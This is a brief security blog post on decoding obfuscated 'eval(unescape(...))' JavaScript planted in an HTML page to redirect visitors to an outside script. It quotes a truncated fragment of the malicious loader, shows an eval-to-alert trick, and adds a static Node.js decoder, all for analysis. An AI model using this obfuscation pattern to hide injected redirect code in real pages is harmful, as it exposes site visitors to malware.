Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code that was innocuously included in an otherwise unthreatening HTML file. He had noticed that the result of the code was to push the client to a .js file hosted on a .cn domain (that can't be good).

However, when viewing the source of the HTML page, he was presented with a fairly common technique often called “Encrypting HTML”, which really should be considered “Obfuscating HTML”, because all the programmer has done is convert “human-readable” code into “human-unreadable, yet browser-readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel is very clever: rewrite eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When this is loaded into a browser, the BROWSER translates the obfuscated code into human-readable form and gives it to you in a nice alert box, allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch. But if you are using Firefox, I suggest you check out JavaScript Deobfuscator.
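The same decoding can be done without opening the suspect file in a browser at all. The following is an added example, not code from the original post: a Node.js sketch that reads only the string literals inside each eval( unescape( ... )) wrapper, joins them, and percent-decodes the result without executing anything. The function names are illustrative, and the sample is the extract shown above with its string literal closed so that it parses.

```javascript
// Static decoder for eval(unescape("..."+"...")) wrappers.
// Nothing from the sample is executed; only string literals are read.

// Constructed sample: the extract from this post, with the closing quote added.
const SAMPLE = '<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d"));</script>';

// Decode %XX and %uXXXX the way the legacy unescape() does; other text is kept.
function unescapeLegacy(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Accept only "lit" + "lit" + ... and return the joined text.
// Anything else (variables, calls, backslash escapes) returns null,
// so the expression is reported rather than evaluated.
function joinLiterals(expr) {
  const lit = /\s*(?:"([^"\\]*)"|'([^'\\]*)')\s*/y;
  let out = '';
  let pos = 0;
  for (;;) {
    lit.lastIndex = pos;
    const m = lit.exec(expr);
    if (!m) return null;
    out += m[1] !== undefined ? m[1] : m[2];
    pos = lit.lastIndex;
    if (pos === expr.length) return out;
    if (expr[pos] !== '+') return null;
    pos++;
  }
}

// Return one entry per wrapper found: the decoded text, or null when the
// argument is not a plain concatenation of string literals.
// Limitation: a raw ")" inside a literal ends the match early and yields null.
function deobfuscate(source) {
  const wrapper = /eval\s*\(\s*unescape\s*\(([^)]*)\)\s*\)/g;
  const results = [];
  for (const m of source.matchAll(wrapper)) {
    const joined = joinLiterals(m[1]);
    results.push(joined === null ? null : unescapeLegacy(joined));
  }
  return results;
}

// JSON.stringify makes the embedded \r\n visible in the output.
console.log(JSON.stringify(deobfuscate(SAMPLE)));
```

A null entry means the wrapper's argument contains something other than string literals and needs manual review. The decoded text may itself contain another wrapper, in which case it can be passed back to `deobfuscate`.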